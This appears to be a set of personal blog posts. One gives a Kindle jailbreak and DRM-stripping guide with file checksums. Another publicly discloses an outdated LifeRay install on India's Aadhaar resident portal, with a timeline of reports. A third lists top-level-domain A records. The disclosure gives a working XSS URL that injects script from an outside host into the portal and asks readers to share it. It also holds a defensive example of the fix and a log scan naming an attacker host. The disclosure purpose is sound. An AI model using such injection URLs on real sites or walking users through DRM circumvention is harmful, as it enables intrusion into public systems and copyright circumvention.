Abhay Rana aka Nemo

Kindle Hacks, A Self-guide

I run a non-standard Kindle configuration:

  1. Jailbroken (because I want to own the device, not rent it)
  2. Runs KOReader (because I want to read EPUBs and PDFs with reflow.)
  3. DRM Stripping (because I want to own the book, not rent it)

Since I don’t do any of these often enough to automate it, this is a self-guide to help me follow these steps the next time I have to do any of this. No guarantees of this being helpful to anyone else but me.

Jailbreak

The lifehacker guide on how to jailbreak your kindle is a good starting point [archived]. The mobileread forums have the definitive guides. Also see this FAQ on the mobileread wiki.

(Most of these only cover modern paperwhite kindles)

Maintaining the Jailbreak

Sometimes, Kindle firmware updates will stop the Jailbreak. Search for your firmware on mobileread forums. See this link for the 5.8 series.

Copy the .bin file to your kindle root directory and trigger a manual firmware update. That should reboot and re-affirm the jailbreak. To trigger a manual firmware update, go to the Kindle Menu and click “Update”. If it is greyed out, check if the file was copied correctly, and try rebooting.

Applications

Once you have a jailbreak, the rest is mostly installing packages via MRPI. I keep a ready directory of packages I can copy as-is to my Kindle. The current listing is at https://paste.ubuntu.com/p/CXS5hYZdqc/ with most of it just being koreader.

koreader is a FOSS document viewer for E Ink devices that supports Kindle, Kobo, PocketBook, Ubuntu Touch and Android devices.

The primary 2 packages are:

  • Update_KUALBooklet_v2.7_install.bin
  • update_kpvbooklet_0.6.6_install.bin

Run ;log mrpi via search after copying them to re-install them if needed.

koreader

Download the latest release from GitHub.

You should download the kindle5-linux-gnueabi package for modern Paperwhites. Unzip it to the copy directory mentioned above.

Aside: koreader has a Linux AppImage version for desktops, which I package for AUR.

DRM Related Stuff

DRM is inherently bad for users. If I switch my Ebook reader from Kindle (which are great as of today) to a Kobo tomorrow, I want my content to stay with me.

There are much better websites that explain the issues with DRM, so go visit: fckdrm.com, DefectiveByDesign.org, or EFF/drm.

The primary tool for stripping DRM from Kindle books is apprenticeharper’s DeDRM Repo which works as a Calibre Plugin.

Getting the Key

My current key is saved in pass:

pass show Keys/Kindle.k4i |jq

Save it in a file, which you can import to Calibre.

If you don’t have the key or if the above isn’t valid, see this comment on r/ebooks [archived].

Importing the Key

At the bottom-left of the plugin’s customization dialog, you will see a button labeled “Import Existing Keyfiles”. Use this button to import existing ‘.k4i’ key files. Key files might come from being exported from this plugin, or may have been generated using the kindlekey.pyw script running under Wine on Linux systems.

I once did some trickery on the kindlekey.pyw application to get it working on my system, but I didn’t take notes. If I ever do this again - AUTOMATE THIS.

Stripping DRM

Stripping DRM for any medium is always a cat-and-mouse game. Amazon keeps changing the DRM format in every Kindle firmware update, which is why the recommended method is to use a known/older version of the Kindle for Mac/PC Application as your source.

Note: The 1.24.3 release does not work on Linux. If you’re on Linux, you must download the 1.17.0 release instead (sha256=14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200).

  1. Install Kindle for PC. It does work on Wine. Make sure you download 1.24.3 (51068). I trust filehippo for this. The sha256sum for the installer is c7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7.
  2. Install then launch it, and download the book.
  3. Go to ~/Documents/My Kindle Content
  4. Find book by Last Modified Date.
  5. Run calibredb add book.azw. If all goes well, the book should show up in your library, and you should be able to convert it.

Reference Files

I have a backup of my current Kindle files at http://ge.tt/75zk4Dv2 in case you need any of the files mentioned above. Checksums for the files are below, since ge.tt doesn’t believe in HTTPS:

e3b05193ed9d0b482f01dfb550eba67f3b113b5165aae5632379cf35fec2f59d  copy.tar.gz
14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200  KindleForPC-installer-1.17.44170.exe
c7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7  KindleForPC-installer-1.24.51068.exe
50bb0e5d9c03bcb79b17c1b7063cefd2c947a9d1c4392814e6ec05225296472a  kual-helper-0.5.N.zip
39352b4b68993680f06d5ecc57ce7ec4c271b6b5f2386ea998027420c45f2acd  KUAL-KDK-1.0.azw2
ceb207ee4c8d3674f308ff91432aeabf213b203571e270f70b8ae218df6ded7d  KUAL-KDK-2.0.azw2
fce02f0e104e846f1e4cc0e029500c5a722614d63a47035d78ea4cf59f67a448  kual-mrinstaller-1.6.N.zip
4a6de1fafe47ec0e3bfb529edead401c92e66b00697d507abe945679b3b7bc65  KUAL-v2.7.zip
253d0b00b31d62ef9dadb7ca88b98e2718cb35246816b3c50dd63c0a7ef28a52  Update_jailbreak_hotfix_1.14_5.8.10_install.bin
cc63ba1b454d1f32492c835f108ee04aaa80e6e7a95f12b7216c2c015daa2fbc  Update_jailbreak_hotfix_1.14_nomax_install.bin

Aadhaar Vulnerability Public Disclosure

The Vulnerability

The UIDAI Resident Portal (with read access to the entire Aadhaar demographic data) is running a vulnerable version of LifeRay software. It is running LifeRay 6.1, which was declared End-of-Life in February 2016.

This release includes multiple known vulnerabilities, including:

  1. An XSS issue, for which a PoC can be found at resident.uidai.gov.in (Picture Credits: @sanitarypanels)
  2. Multiple RCEs: see issue-62 for example.

In fact, the release is so old it does not even appear on the “Known Vulnerabilities” page on the LifeRay website; you have to go look at their Archived Vulnerabilities.

The PoC

You can find a simple Proof of Concept for the XSS issue at resident.uidai.gov.in.

The cdn_host parameter injects JavaScript from $CDN_HOST/Resident-theme/js/custom.js, in this case https://scan.bb8.fun/Resident-theme/js/custom.js, which hosts a small snippet to overwrite the HTML of the page.

It shows up like:

Fun

The current script allows for embedding any tweet using a tweet parameter. To embed:

Go to any tweet, copy the part after twitter.com and pass it as the tweet parameter. For example, to embed this tweet:

  1. Look at the URL: https://twitter.com/13footwall/status/979301578686345216
  2. Copy 13footwall/status/979301578686345216 and pass it as the tweet parameter:
  3. The URL becomes https://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun&tweet=13footwall/status/979301578686345216
  4. SHARE IT

The Report

I initially reported this to help@uidai.gov.in in Jan 2017:

Forgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:

Update

There is some confusion regarding which version of LifeRay UIDAI is running. They seem to be running 6.1.1, released on 2013-02-26.

The exact version is not relevant to the fact that UIDAI is:

  • running an unsupported release
  • which is 5 years old
  • not updating it despite being notified multiple times

0800 16-Sep: UIDAI seems to have patched the issue by putting a block on the cdn_host parameter. This still leaves them exposed to multiple known vulnerabilities until they update to a supported release.
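The cdn_host issue described in the PoC section and the block UIDAI later put on the parameter, as an added example (not UIDAI’s or LifeRay’s code): the vulnerable sink beside an allowlisted version, plus a check over constructed access-log lines that flags requests pointing cdn_host at an outside origin. The allowlist, default origin and log lines are assumptions.

```python
# Added example, not code from the UIDAI portal or LifeRay.
from urllib.parse import urlsplit, parse_qs

# Assumed allowlist of origins the portal may load theme assets from.
ALLOWED_CDN_HOSTS = {"resident.uidai.gov.in"}
DEFAULT_CDN = "https://resident.uidai.gov.in"
THEME_JS_PATH = "/Resident-theme/js/custom.js"   # path named in the write-up


def vulnerable_script_src(request_url: str) -> str:
    """Before: whatever cdn_host the client sends becomes the script origin."""
    qs = parse_qs(urlsplit(request_url).query)
    return qs.get("cdn_host", [DEFAULT_CDN])[0] + THEME_JS_PATH


def safe_script_src(request_url: str) -> str:
    """After: honour cdn_host only if it is a bare https origin on the allowlist.

    Rejects userinfo tricks (https://allowed@evil), ports, paths and queries
    by rebuilding the URL from the parsed hostname instead of echoing input.
    """
    qs = parse_qs(urlsplit(request_url).query)
    cdn_host = qs.get("cdn_host", [None])[0]
    if cdn_host:
        p = urlsplit(cdn_host)
        if (p.scheme == "https" and p.hostname in ALLOWED_CDN_HOSTS
                and p.port is None and not p.path and not p.query):
            return f"https://{p.hostname}{THEME_JS_PATH}"
    return DEFAULT_CDN + THEME_JS_PATH


def external_cdn_requests(log_lines):
    """Return the off-allowlist cdn_host values seen in Common Log Format lines."""
    hits = []
    for line in log_lines:
        try:  # request target is the 2nd token inside the quoted request line
            target = line.split('"')[1].split()[1]
        except IndexError:
            continue
        for host in parse_qs(urlsplit(target).query).get("cdn_host", []):
            if urlsplit(host).hostname not in ALLOWED_CDN_HOSTS:
                hits.append(host)
    return hits


# Constructed sample log lines (not real portal traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [16/Sep/2018:07:58:01 +0530] "GET / HTTP/1.1" 200 4096',
    '198.51.100.8 - - [16/Sep/2018:07:58:09 +0530] "GET /?cdn_host=https://resident.uidai.gov.in HTTP/1.1" 200 4096',
    '203.0.113.5 - - [16/Sep/2018:07:59:30 +0530] "GET /?cdn_host=https://cdn.attacker.example&tweet=x HTTP/1.1" 200 5120',
]
```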

Timeline

The vulnerability is still not fixed. Here is a complete timeline:

Date         What?
16 Jan 2017  Initially reported to help@uidai.gov.in. No response
21 Jan 2018  Reported to ceo@uidai.gov.in and info@cert-in.org.in. No response
19 Feb 2018  Reminder sent to ceo@uidai.gov.in and info@cert-in.org.in
19 Feb 2018  Acknowledgement from CERT
15 Mar 2018  Reminder sent. No response
17 Mar 2018  Notified NCIIPC
18 Mar 2018  Confirmation from NCIIPC asking for more details. I replied with a quote of the previous exchange
19 Mar 2018  Confirmation from NCIIPC thanking me for the report.
19 Apr 2018  Reminder sent to UIDAI asking for acknowledgement
30 May 2018  Reminder sent to NCIIPC and CERT asking for updates

The only change that I’m aware of since my initial report is that the website stopped declaring the LifeRay version in an HTTP response header.

A records on top level domains

A few more changes since the last time I ran this.

TLD      IP              Web
ai       209.59.119.34   [http] [https]
arab     127.0.53.53     [http] [https]
bh       88.201.27.211   [http] [https]
charity  127.0.53.53     [http] [https]
cm       195.24.205.60   [http] [https]
dk       193.163.102.58  [http] [https]
gg       87.117.196.80   [http] [https]
inc      127.0.53.53     [http] [https]
je       87.117.196.80   [http] [https]
pa       168.77.8.43     [http] [https]
pn       80.68.93.100    [http] [https]
politie  127.0.53.53     [http] [https]
tk       217.119.57.22   [http] [https]
uz       91.212.89.8     [http] [https]
ws       64.70.19.33     [http] [https]
мон      202.170.80.40   [http] [https]
мон      218.100.84.27   [http] [https]
мон      180.149.98.78   [http] [https]
政府     127.0.53.53     [http] [https]
عرب      127.0.53.53     [http] [https]

Diff:

+bh
+charity
-etisalat
+inc
-اتصالات
-招聘
 政府